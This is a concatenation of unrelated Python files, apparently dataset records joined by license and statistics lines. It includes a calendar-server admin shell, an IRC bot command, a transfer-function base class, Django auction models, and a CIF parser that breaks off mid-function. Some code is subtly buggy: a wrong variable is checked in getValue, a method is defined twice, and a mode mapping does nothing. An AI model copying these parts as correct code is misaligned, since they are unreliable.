@inlineCallbacks
def complete_cd(self, tokens):
returnValue((yield self.complete_files(
tokens,
filter=lambda item: True #issubclass(item[0], Folder)
)))
@inlineCallbacks
def cmd_ls(self, tokens):
"""
List target.
usage: ls [target ...]
"""
targets = (yield self.getTargets(tokens, wdFallback=True))
multiple = len(targets) > 0
for target in targets:
entries = sorted((yield target.list()), key=lambda e: e.fileName)
#
# FIXME: this can be ugly if, for example, there are zillions
# of entries to output. Paging would be good.
#
table = Table()
for entry in entries:
table.addRow(entry.toFields())
if multiple:
self.terminal.write("%s:\n" % (target,))
if table.rows:
table.printTable(self.terminal)
self.terminal.nextLine()
complete_ls = CommandsBase.complete_files
@inlineCallbacks
def cmd_info(self, tokens):
"""
Print information about a target.
usage: info [target]
"""
target = (yield self.getTarget(tokens, wdFallback=True))
if tokens:
raise UnknownArguments(tokens)
description = (yield target.describe())
self.terminal.write(description)
self.terminal.nextLine()
complete_info = CommandsBase.complete_files
@inlineCallbacks
def cmd_cat(self, tokens):
"""
Show contents of target.
usage: cat target [target ...]
"""
targets = (yield self.getTargets(tokens))
if not targets:
raise InsufficientArguments()
for target in targets:
if hasattr(target, "text"):
text = (yield target.text())
self.terminal.write(text)
complete_cat = CommandsBase.complete_files
@inlineCallbacks
def cmd_rm(self, tokens):
"""
Remove target.
usage: rm target [target ...]
"""
options, tokens = getopt(tokens, "", ["no-implicit"])
implicit = True
for option, _ignore_value in options:
if option == "--no-implicit":
# Not in docstring; this is really dangerous.
implicit = False
else:
raise AssertionError("We should't be here.")
targets = (yield self.getTargets(tokens))
if not targets:
raise InsufficientArguments()
for target in targets:
if hasattr(target, "delete"):
target.delete(implicit=implicit)
else:
self.terminal.write("Can not delete read-only target: %s\n" % (target,))
cmd_rm.hidden = "Incomplete"
complete_rm = CommandsBase.complete_files
#
# Principal tools
#
@inlineCallbacks
def cmd_find_principals(self, tokens):
"""
Search for matching principals
usage: find_principal search_term
"""
if not tokens:
raise UsageError("No search term")
directory = self.protocol.service.directory
records = (yield findRecords(directory, tokens))
if records:
self.terminal.write((yield summarizeRecords(directory, records)))
else:
self.terminal.write("No matching principals found.")
self.terminal.nextLine()
@inlineCallbacks
def cmd_print_principal(self, tokens):
"""
Print information about a principal.
usage: print_principal principal_id
"""
if tokens:
id = tokens.pop(0)
else:
raise UsageError("Principal ID required")
if tokens:
raise UnknownArguments(tokens)
directory = self.protocol.service.directory
record = self.directoryRecordWithID(id)
if record:
self.terminal.write((yield recordInfo(directory, record)))
else:
self.terminal.write("No such principal.")
self.terminal.nextLine()
#
# Data purge tools
#
@inlineCallbacks
def cmd_purge_principals(self, tokens):
"""
Purge data associated principals.
usage: purge_principals principal_id [principal_id ...]
"""
dryRun = True
completely = False
doimplicit = True
directory = self.protocol.service.directory
records = []
for id in tokens:
record = self.directoryRecordWithID(id)
records.append(record)
if not record:
self.terminal.write("Unknown UID: %s\n" % (id,))
if None in records:
self.terminal.write("Aborting.\n")
return
if dryRun:
toPurge = "to purge"
else:
toPurge = "purged"
total = 0
for record in records:
count, _ignore_assignments = (yield PurgePrincipalService.purgeUIDs(
self.protocol.service.store,
directory,
(record.uid,),
verbose=False,
dryrun=dryRun,
completely=completely,
doimplicit=doimplicit,
))
total += count
self.terminal.write(
"%d events %s for UID %s.\n"
% (count, toPurge, record.uid)
)
self.terminal.write(
"%d total events %s.\n"
% (total, toPurge)
)
cmd_purge_principals.hidden = "incomplete"
#
# Sharing
#
def cmd_share(self, tokens):
"""
Share a resource with a principal.
usage: share mode principal_id target [target ...]
mode: r (read) or rw (read/write)
"""
if len(tokens) < 3:
raise InsufficientArguments()
mode = tokens.pop(0)
principalID = tokens.pop(0)
record = self.directoryRecordWithID(principalID)
if not record:
self.terminal.write("Principal not found: %s\n" % (principalID,))
targets = self.getTargets(tokens)
if mode == "r":
mode = None
elif mode == "rw":
mode = None
else:
raise UsageError("Unknown mode: %s" % (mode,))
for _ignore_target in targets:
raise NotImplementedError()
cmd_share.hidden = "incomplete"
#
# Python prompt, for the win
#
def cmd_python(self, tokens):
"""
Switch to a python prompt.
usage: python
"""
if tokens:
raise UnknownArguments(tokens)
if not hasattr(self, "_interpreter"):
# Bring in some helpful local variables.
from txdav.common.datastore.sql_tables import schema
from twext.enterprise.dal import syntax
localVariables = dict(
self=self,
store=self.protocol.service.store,
schema=schema,
)
# FIXME: Use syntax.__all__, which needs to be defined
for key, value in syntax.__dict__.items():
if not key.startswith("_"):
localVariables[key] = value
class Handler(object):
def addOutput(innerSelf, bytes, async=False): #@NoSelf
"""
This is a delegate method, called by ManholeInterpreter.
"""
if async:
self.terminal.write("... interrupted for Deferred ...\n")
self.terminal.write(bytes)
if async:
self.terminal.write("\n")
self.protocol.drawInputLine()
self._interpreter = ManholeInterpreter(Handler(), localVariables)
def evalSomePython(line):
if line == "exit":
# Return to normal command mode.
del self.protocol.lineReceived
del self.protocol.ps
try:
del self.protocol.pn
except AttributeError:
pass
self.protocol.drawInputLine()
return
more = self._interpreter.push(line)
self.protocol.pn = bool(more)
lw = self.terminal.lastWrite
if not (lw.endswith("\n") or lw.endswith("\x1bE")):
self.terminal.write("\n")
self.protocol.drawInputLine()
self.protocol.lineReceived = evalSomePython
self.protocol.ps = (">>> ", "... ")
cmd_python.hidden = "debug tool"
#
# SQL prompt, for not as winning
#
def cmd_sql(self, tokens):
"""
Switch to an SQL prompt.
usage: sql
"""
if tokens:
raise UnknownArguments(tokens)
raise NotImplementedError("Command not implemented")
cmd_sql.hidden = "not implemented"
#
# Test tools
#
def cmd_raise(self, tokens):
"""
Raises an exception.
usage: raise [message ...]
"""
raise RuntimeError(" ".join(tokens))
cmd_raise.hidden = "test tool"
def cmd_reload(self, tokens):
"""
Reloads code.
usage: reload
"""
if tokens:
raise UnknownArguments(tokens)
import calendarserver.tools.shell.vfs
reload(calendarserver.tools.shell.vfs)
import calendarserver.tools.shell.directory
reload(calendarserver.tools.shell.directory)
self.protocol.reloadCommands()
cmd_reload.hidden = "test tool"
def cmd_xyzzy(self, tokens):
"""
"""
self.terminal.write("Nothing happens.")
self.terminal.nextLine()
cmd_sql.hidden = ""
|
apache-2.0
| -2,939,539,558,737,499,600 | 24.388889 | 90 | 0.532914 | false |
sckasturi/saltlake
|
commands/creffett.py
|
1
|
1622
|
# Copyright (C) 2013-2014 Fox Wilson, Peter Foley, Srijay Kasturi, Samuel Damashek, James Forcier and Reed Koser
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from helpers.command import Command
from helpers.textutils import gen_creffett
@Command(['creffett', 'rage'], ['nick', 'target', 'ignore', 'do_kick', 'botnick', 'name'])
def cmd(send, msg, args):
"""RAGE!!!
Syntax: {command} <text>
"""
if args['name'] == 'creffett':
if not args['nick'].startswith('creffett') and args['nick'] != args['botnick']:
send("You're not creffett!")
args['ignore'](args['nick'])
if args['target'] != 'private':
args['do_kick'](args['target'], args['nick'], 'creffett impersonation')
return
if not msg:
send("Rage about what?")
return
# c.send_raw("MODE %s -c" % CHANNEL)
send(gen_creffett(msg))
# c.send_raw("MODE %s +c" % CHANNEL)
send('</rage>')
|
gpl-2.0
| 4,373,758,906,741,645,000 | 40.589744 | 112 | 0.660296 | false |
IntegratedAlarmSystem-Group/ias
|
CompElement/src/main/python/IasTransferFunction/TransferFunction.py
|
1
|
4513
|
import logging
class TransferFunction(object):
'''
Base (and abstract) class to provide TFs in python programming language.
Usage: python TF implementations must extend this class and provide, as a minimum,
the implementation of the transfer method.
It is the python equivalent of the JavaTransferExecutor class
'''
def __init__(self, asceId, asceRunningId, validityTimeFrame, props, instance):
'''
Constructor
:param asceId: The ID of the ASCE that runs the python TF
:param asceRunningId: The running ID of the ASCE that runs the python TF
:param validityTimeFrame: The validity time frame (long)
:param props: a dictionary of properties
'''
assert asceId is not None and asceId!="", "Invalid ID of ASCE"
self.asceID=asceId
logging.debug("Building python TF for ASCE %s",self.asceID)
assert asceRunningId is not None and asceRunningId!="", "Invalid running ID of ASCE"
self.asceRunningId = asceRunningId
assert validityTimeFrame>=0, "Invalid validity time frame "+validityTimeFrame
self.validityTimeFrame=validityTimeFrame
if props is None:
self.props = {}
else:
assert isinstance(props,dict)
self.props=props
self.instance = None
if instance is not None:
assert isinstance(instance,int), "The instance must be an integer"
self.instance = instance
logging.info("Python TF of %s successfully built",self.asceRunningId)
def setTemplateInstance(self, instance):
'''
Set the instance of the template, if any.
:param instance: the instance number or None if there is no template
:return:
'''
self.instance=instance
if (self.instance is None):
logging.debug("Python TF of %s is NOT templated",self.asceRunningId)
else:
logging.info("Python TF of %s has template %d",self.asceRunningId,self.instance)
def isTemplated(self):
'''
:return: the number of the instance or NOne if not template
'''
return self.instance is not None
def shutdown(self):
'''
Last method called when the object life terminates.
It is usually called to free acquired resources.
:return:
'''
pass
def initialize(self, inputsInfo, outputInfo):
'''
Initialize the TF.
Must be overridden if the user provided implementation needs
to know the ID and type of the inputs and the output.
It iusuall implemented to increase the robustness for example
if the user implemented TF compare the value of the input with a threshold,
it can be used to check that the input is a numeric type.
:param inputsInfo: the list of IasioInfo with the ids and type of inputs
:param outputInfo: the type and ID of the output
:return: None
'''
pass
def eval(self,compInputs, actualOutput):
'''
The eval method to produce the output based on the value of the inputs
:param compInputs: computing element inputs (IASIOs)
:param actualOutput: the actual value of the output i.e. tha value computed at previous
iteration (IASIO)
:return: the new output of the ASCE (IASIO)
'''
raise NotImplementedError('Python TF implementation missing')
def getValue(self, inputs, id, instance):
'''
Get a value from its ID taking into account templates
It is the same method present in the JavaTransferExecutor and in ScalaTransferExecutor
:param inputs: the map of inputs as received in the eval method
:param id: the id (string) of the input (without template)
:param instance: the instance (int) or None if not templated
:return: the value or None if not found
'''
if (inputs is None or id is None):
raise ValueError("Maps of input and id can't be None")
assert isinstance(input,dict), "Map of inputs expected"
assert isinstance(id,str), "The ID must be a string"
if instance is not None:
assert isinstance(instance,int), "The instance must be an integer (instead of "+instance+")"
postFix= "[!#"+str(instance)+"!]"
else:
postFix = ""
idToSearch = id + postFix
return inputs.get(idToSearch)
|
lgpl-3.0
| 4,129,720,936,681,593,300 | 36.305785 | 104 | 0.637049 | false |
ajportier/djauction
|
models.py
|
1
|
3333
|
from django.db import models
STATE_CHOICES = (
('pa', 'Pennsylvania'),
('nj', 'New Jersey'),
)
ITEM_CHOICES = (
('event','Event'),
('food','Food'),
('goods','Goods'),
('service','Service'),
('other','Other'),
)
PAYMENT_CHOICES = (
('none','None'),
('cash','Cash'),
('check','Check'),
('credit','Credit'),
)
class Auction(models.Model):
''' Model to represent an Auction '''
name = models.CharField(max_length=255)
date = models.DateField()
def __unicode__(self):
return self.name + ' ' + str(self.date)
class AuctionUser(models.Model):
''' Model to represent an Auction User; i.e. someone who donates
or bids on users '''
name = models.CharField(max_length=255)
address_1 = models.CharField(max_length=255, blank=True)
address_2 = models.CharField(max_length=255, blank=True)
city = models.CharField(max_length=255, blank=True)
state = models.CharField(max_length=2, choices=STATE_CHOICES,
blank=True)
zip = models.CharField(max_length=10, blank=True)
phone = models.CharField(max_length=255, blank=True)
email = models.EmailField(max_length=255, blank=True)
def __unicode__(self):
return self.name
class AuctionParticipant(models.Model):
''' Model to represent an Auction Participant; i.e. someone who
will be bidding on items in the auction '''
auction = models.ForeignKey(Auction)
user = models.ForeignKey(AuctionUser)
paddle = models.PositiveIntegerField()
payment_method = models.CharField(max_length=10, choices=PAYMENT_CHOICES,
default='none')
payment_notes = models.TextField(blank=True)
def __unicode__(self):
return str(self.user) + ' (' + str(self.paddle) + ')'
class AuctionEvent(models.Model):
''' Model to represent an Auction Event; i.e. a collection of items
that will be bid on during the auction '''
name = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=10)
auction = models.ForeignKey(Auction)
def __unicode__(self):
return self.name + ' ' + self.abbreviation
class AuctionItem(models.Model):
''' Model to represent an Item to be bid on in an auction '''
name = models.CharField(max_length=255)
item_type = models.CharField(max_length=20, choices=ITEM_CHOICES)
item_number = models.IntegerField()
description = models.TextField(blank=True)
image = models.ImageField(max_length=255,upload_to='images',blank=True)
valid_winners = models.PositiveIntegerField(default=1)
auction = models.ForeignKey(Auction)
auction_event = models.ForeignKey(AuctionEvent)
donor = models.ForeignKey(AuctionUser)
starting_bid = models.FloatField()
conditions = models.TextField(blank=True)
time_and_location = models.TextField(blank=True)
def __unicode__(self):
return str(self.auction_event.abbreviation) + str(self.item_number) + ' ' + self.name
class AuctionBid(models.Model):
''' Model to represent an individual Bid in an Auction '''
auction = models.ForeignKey(Auction)
bidder = models.ForeignKey(AuctionParticipant)
item = models.ForeignKey(AuctionItem)
ammount = models.FloatField()
def __unicode__(self):
return str(self.bidder) + ' ' + str(self.ammount)
|
gpl-3.0
| -4,610,285,118,682,957,000 | 29.861111 | 93 | 0.663366 | false |
heprom/pymicro
|
pymicro/external/YappsStarParser_2_0.py
|
1
|
21486
|
# To maximize python3/python2 compatibility
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from .StarFile import StarBlock,StarFile,StarList,StarDict
from io import StringIO
# An alternative specification for the Cif Parser, based on Yapps2
# by Amit Patel (http://theory.stanford.edu/~amitp/Yapps)
#
# helper code: we define our match tokens
lastval = ''
def monitor(location,value):
global lastval
#print 'At %s: %s' % (location,repr(value))
lastval = repr(value)
return value
# Strip extras gets rid of leading and trailing whitespace, and
# semicolons.
def stripextras(value):
from .StarFile import remove_line_folding, remove_line_prefix
# we get rid of semicolons and leading/trailing terminators etc.
import re
jj = re.compile("[\n\r\f \t\v]*")
semis = re.compile("[\n\r\f \t\v]*[\n\r\f]\n*;")
cut = semis.match(value)
if cut: #we have a semicolon-delimited string
nv = value[cut.end():len(value)-2]
try:
if nv[-1]=='\r': nv = nv[:-1]
except IndexError: #empty data value
pass
# apply protocols
nv = remove_line_prefix(nv)
nv = remove_line_folding(nv)
return nv
else:
cut = jj.match(value)
if cut:
return stripstring(value[cut.end():])
return value
# helper function to get rid of inverted commas etc.
def stripstring(value):
if value:
if value[0]== '\'' and value[-1]=='\'':
return value[1:-1]
if value[0]=='"' and value[-1]=='"':
return value[1:-1]
return value
# helper function to get rid of triple quotes
def striptriple(value):
if value:
if value[:3] == '"""' and value[-3:] == '"""':
return value[3:-3]
if value[:3] == "'''" and value[-3:] == "'''":
return value[3:-3]
return value
# helper function to populate a StarBlock given a list of names
# and values .
#
# Note that there may be an empty list at the very end of our itemlists,
# so we remove that if necessary.
#
def makeloop(target_block,loopdata):
loop_seq,itemlists = loopdata
if itemlists[-1] == []: itemlists.pop(-1)
# print('Making loop with %s' % repr(itemlists))
step_size = len(loop_seq)
for col_no in range(step_size):
target_block.AddItem(loop_seq[col_no], itemlists[col_no::step_size],precheck=True)
# now construct the loop
try:
target_block.CreateLoop(loop_seq) #will raise ValueError on problem
except ValueError:
error_string = 'Incorrect number of loop values for loop containing %s' % repr(loop_seq)
print(error_string, file=sys.stderr)
raise ValueError(error_string)
# return an object with the appropriate amount of nesting
def make_empty(nestlevel):
gd = []
for i in range(1,nestlevel):
gd = [gd]
return gd
# this function updates a dictionary first checking for name collisions,
# which imply that the CIF is invalid. We need case insensitivity for
# names.
# Unfortunately we cannot check loop item contents against non-loop contents
# in a non-messy way during parsing, as we may not have easy access to previous
# key value pairs in the context of our call (unlike our built-in access to all
# previous loops).
# For this reason, we don't waste time checking looped items against non-looped
# names during parsing of a data block. This would only match a subset of the
# final items. We do check against ordinary items, however.
#
# Note the following situations:
# (1) new_dict is empty -> we have just added a loop; do no checking
# (2) new_dict is not empty -> we have some new key-value pairs
#
def cif_update(old_dict,new_dict,loops):
old_keys = map(lambda a:a.lower(),old_dict.keys())
if new_dict != {}: # otherwise we have a new loop
#print 'Comparing %s to %s' % (repr(old_keys),repr(new_dict.keys()))
for new_key in new_dict.keys():
if new_key.lower() in old_keys:
raise CifError("Duplicate dataname or blockname %s in input file" % new_key)
old_dict[new_key] = new_dict[new_key]
#
# this takes two lines, so we couldn't fit it into a one line execution statement...
def order_update(order_array,new_name):
order_array.append(new_name)
return new_name
# and finally...turn a sequence into a python dict (thanks to Stackoverflow)
def pairwise(iterable):
try:
it = iter(iterable)
while 1:
yield next(it), next(it)
except StopIteration:
return
# Begin -- grammar generated by Yapps
import sys, re
from . import yapps3_compiled_rt as yappsrt
class StarParserScanner(yappsrt.Scanner):
def __init__(self, *args,**kwargs):
patterns = [
('":"', ':'),
('([ \t\n\r](?!;))|[ \t]', '([ \t\n\r](?!;))|[ \t]'),
('(#.*[\n\r](?!;))|(#.*)', '(#.*[\n\r](?!;))|(#.*)'),
('LBLOCK', '(L|l)(O|o)(O|o)(P|p)_'),
('GLOBAL', '(G|g)(L|l)(O|o)(B|b)(A|a)(L|l)_'),
('STOP', '(S|s)(T|t)(O|o)(P|p)_'),
('save_heading', u'(S|s)(A|a)(V|v)(E|e)_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('save_end', '(S|s)(A|a)(V|v)(E|e)_'),
('data_name', u'_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('data_heading', u'(D|d)(A|a)(T|t)(A|a)_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('start_sc_line', '(\n|\r\n);([^\n\r])*(\r\n|\r|\n)+'),
('sc_line_of_text', '[^;\r\n]([^\r\n])*(\r\n|\r|\n)+'),
('end_sc_line', ';'),
('c_c_b', '\\}'),
('o_c_b', '\\{'),
('c_s_b', '\\]'),
('o_s_b', '\\['),
('dat_val_internal_sq', '\\[([^\\s\\[\\]]*)\\]'),
('triple_quote_data_value', '(?s)\'\'\'.*?\'\'\'|""".*?"""'),
('single_quote_data_value', '\'([^\n\r\x0c\'])*\'+|"([^\n\r"])*"+'),
('data_value_1', '((?!(((S|s)(A|a)(V|v)(E|e)_[^\\s]*)|((G|g)(L|l)(O|o)(B|b)(A|a)(L|l)_[^\\s]*)|((S|s)(T|t)(O|o)(P|p)_[^\\s]*)|((D|d)(A|a)(T|t)(A|a)_[^\\s]*)))[^\\s"#$\'_\\{\\}\\[\\]][^\\s\\{\\}\\[\\]]*)'),
('END', '$'),
]
yappsrt.Scanner.__init__(self,patterns,['([ \t\n\r](?!;))|[ \t]', '(#.*[\n\r](?!;))|(#.*)'],*args,**kwargs)
class StarParser(yappsrt.Parser):
Context = yappsrt.Context
def input(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'input', [prepared])
_token = self._peek('END', 'data_heading')
if _token == 'data_heading':
dblock = self.dblock(prepared, _context)
allblocks = prepared; allblocks.merge_fast(dblock)
while self._peek('END', 'data_heading') == 'data_heading':
dblock = self.dblock(prepared, _context)
allblocks.merge_fast(dblock)
if self._peek() not in ['END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['END', 'data_heading']))
END = self._scan('END')
else: # == 'END'
END = self._scan('END')
allblocks = prepared
allblocks.unlock(); return allblocks
def dblock(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'dblock', [prepared])
data_heading = self._scan('data_heading')
heading = data_heading[5:];thisbc=StarFile(characterset='unicode',standard=prepared.standard);act_heading = thisbc.NewBlock(heading,prepared.blocktype(overwrite=False));stored_block = thisbc[act_heading]
while self._peek('save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading') in ['save_heading', 'LBLOCK', 'data_name']:
_token = self._peek('save_heading', 'LBLOCK', 'data_name')
if _token != 'save_heading':
dataseq = self.dataseq(stored_block, _context)
else: # == 'save_heading'
save_frame = self.save_frame(prepared, _context)
thisbc.merge_fast(save_frame,parent=stored_block)
if self._peek() not in ['save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading']))
stored_block.setmaxnamelength(stored_block.maxnamelength);return (monitor('dblock',thisbc))
def dataseq(self, starblock, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'dataseq', [starblock])
data = self.data(starblock, _context)
while self._peek('save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading') in ['LBLOCK', 'data_name']:
data = self.data(starblock, _context)
if self._peek() not in ['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']))
def data(self, currentblock, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'data', [currentblock])
_token = self._peek('LBLOCK', 'data_name')
if _token == 'LBLOCK':
top_loop = self.top_loop(_context)
makeloop(currentblock,top_loop)
else: # == 'data_name'
datakvpair = self.datakvpair(_context)
currentblock.AddItem(datakvpair[0],datakvpair[1],precheck=False)
def datakvpair(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'datakvpair', [])
data_name = self._scan('data_name')
data_value = self.data_value(_context)
return [data_name,data_value]
def data_value(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'data_value', [])
_token = self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b')
if _token == 'data_value_1':
data_value_1 = self._scan('data_value_1')
thisval = data_value_1
elif _token not in ['start_sc_line', 'o_s_b', 'o_c_b']:
delimited_data_value = self.delimited_data_value(_context)
thisval = delimited_data_value
elif _token == 'start_sc_line':
sc_lines_of_text = self.sc_lines_of_text(_context)
thisval = stripextras(sc_lines_of_text)
else: # in ['o_s_b', 'o_c_b']
bracket_expression = self.bracket_expression(_context)
thisval = bracket_expression
return monitor('data_value',thisval)
def delimited_data_value(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'delimited_data_value', [])
_token = self._peek('triple_quote_data_value', 'single_quote_data_value')
if _token == 'triple_quote_data_value':
triple_quote_data_value = self._scan('triple_quote_data_value')
thisval = striptriple(triple_quote_data_value)
else: # == 'single_quote_data_value'
single_quote_data_value = self._scan('single_quote_data_value')
thisval = stripstring(single_quote_data_value)
return thisval
def sc_lines_of_text(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'sc_lines_of_text', [])
start_sc_line = self._scan('start_sc_line')
lines = StringIO();lines.write(start_sc_line)
while self._peek('end_sc_line', 'sc_line_of_text') == 'sc_line_of_text':
sc_line_of_text = self._scan('sc_line_of_text')
lines.write(sc_line_of_text)
if self._peek() not in ['end_sc_line', 'sc_line_of_text']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['sc_line_of_text', 'end_sc_line']))
end_sc_line = self._scan('end_sc_line')
lines.write(end_sc_line);return monitor('sc_line_of_text',lines.getvalue())
def bracket_expression(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'bracket_expression', [])
_token = self._peek('o_s_b', 'o_c_b')
if _token == 'o_s_b':
square_bracket_expr = self.square_bracket_expr(_context)
return square_bracket_expr
else: # == 'o_c_b'
curly_bracket_expr = self.curly_bracket_expr(_context)
return curly_bracket_expr
def top_loop(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'top_loop', [])
LBLOCK = self._scan('LBLOCK')
loopfield = self.loopfield(_context)
loopvalues = self.loopvalues(_context)
return loopfield,loopvalues
def loopfield(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'loopfield', [])
loop_seq=[]
while self._peek('data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b') == 'data_name':
data_name = self._scan('data_name')
loop_seq.append(data_name)
if self._peek() not in ['data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_name', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']))
return loop_seq
def loopvalues(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'loopvalues', [])
data_value = self.data_value(_context)
dataloop=[data_value]
while self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading') in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b']:
data_value = self.data_value(_context)
dataloop.append(monitor('loopval',data_value))
if self._peek() not in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b', 'LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']))
return dataloop
def save_frame(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'save_frame', [prepared])
save_heading = self._scan('save_heading')
savehead = save_heading[5:];savebc = StarFile();newname = savebc.NewBlock(savehead,prepared.blocktype(overwrite=False));stored_block = savebc[newname]
while self._peek('save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading') in ['LBLOCK', 'data_name']:
dataseq = self.dataseq(savebc[savehead], _context)
if self._peek() not in ['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']))
save_end = self._scan('save_end')
return monitor('save_frame',savebc)
def save_frame(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'save_frame', [prepared])
save_heading = self._scan('save_heading')
savehead = save_heading[5:];savebc = StarFile();newname = savebc.NewBlock(savehead,prepared.blocktype(overwrite=False));stored_block = savebc[newname]
while self._peek('save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading') in ['LBLOCK', 'data_name']:
dataseq = self.dataseq(savebc[savehead], _context)
if self._peek() not in ['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']))
save_end = self._scan('save_end')
return monitor('save_frame',savebc)
def square_bracket_expr(self, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'square_bracket_expr', [])
o_s_b = self._scan('o_s_b')
this_list = []
while self._peek('c_s_b', 'data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'o_s_b', 'o_c_b') != 'c_s_b':
data_value = self.data_value(_context)
this_list.append(data_value)
while self._peek('data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'c_s_b', 'o_s_b', 'o_c_b') != 'c_s_b':
data_value = self.data_value(_context)
this_list.append(data_value)
if self._peek() not in ['data_value_1', 'triple_quote_data_value', 'single_quote_data_value', 'start_sc_line', 'c_s_b', 'o_s_b', 'o_c_b']:
